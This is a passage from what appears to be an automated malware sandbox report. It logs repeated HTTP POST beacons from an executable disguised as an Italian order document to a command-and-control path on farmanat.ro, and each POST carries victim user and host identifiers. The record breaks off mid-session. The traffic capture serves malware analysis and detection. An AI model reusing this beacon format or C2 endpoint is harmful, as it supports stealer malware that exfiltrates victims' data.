                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              43192.168.11.2049879176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:29.436238050 CET6370OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:29.469530106 CET6370OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:29.519896030 CET6370INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              430192.168.11.2050274176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:49.081962109 CET6918OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:49.115370035 CET6918OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:49.164314032 CET6919INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              431192.168.11.2050275176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:49.567233086 CET6919OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:49.601313114 CET6920OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:49.650599003 CET6920INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              432192.168.11.2050276176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:50.073434114 CET6921OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:50.107034922 CET6921OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:50.156475067 CET6921INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              433192.168.11.2050277176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:50.587693930 CET6922OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:50.622014046 CET6922OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:50.675915956 CET6923INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              434192.168.11.2050278176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:51.089071035 CET6923OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:51.122725010 CET6924OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:51.172583103 CET6924INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              435192.168.11.2050279176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:51.558423042 CET6925OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:51.592035055 CET6925OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:51.641408920 CET6925INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              436192.168.11.2050280176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:52.059237957 CET6926OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:52.093511105 CET6926OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:52.143548965 CET6927INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              437192.168.11.2050281176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:52.528089046 CET6927OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:52.562410116 CET6928OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:52.614006042 CET6928INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              438192.168.11.2050282176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:53.007932901 CET6929OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:53.042098999 CET6929OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:53.092668056 CET6929INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              439192.168.11.2050283176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:53.539836884 CET6930OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:53.573438883 CET6930OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:53.622716904 CET6931INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              44192.168.11.2049880176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:29.956862926 CET6371OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:29.991008997 CET6371OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:30.042423010 CET6372INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              440192.168.11.2050284176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:54.048854113 CET6931OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:54.082403898 CET6932OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:54.131594896 CET6932INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              441192.168.11.2050285176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:54.571504116 CET6933OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:54.605751038 CET6933OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:54.655401945 CET6933INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              442192.168.11.2050286176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:55.074582100 CET6934OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:55.108170986 CET6934OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:55.157455921 CET6935INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              443192.168.11.2050287176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:55.507302046 CET6936OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:55.541939974 CET6936OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:55.597352982 CET6936INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              444192.168.11.2050288176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:56.038111925 CET6937OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:56.071635962 CET6937OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:56.120891094 CET6938INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              445192.168.11.2050289176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:56.542011976 CET6939OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:56.575879097 CET6939OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:56.625315905 CET6939INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              446192.168.11.2050290176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:57.052498102 CET6940OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:57.086070061 CET6940OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:57.135432959 CET6940INHTTP/1.1 404 Not Found
                                              Server: nginx
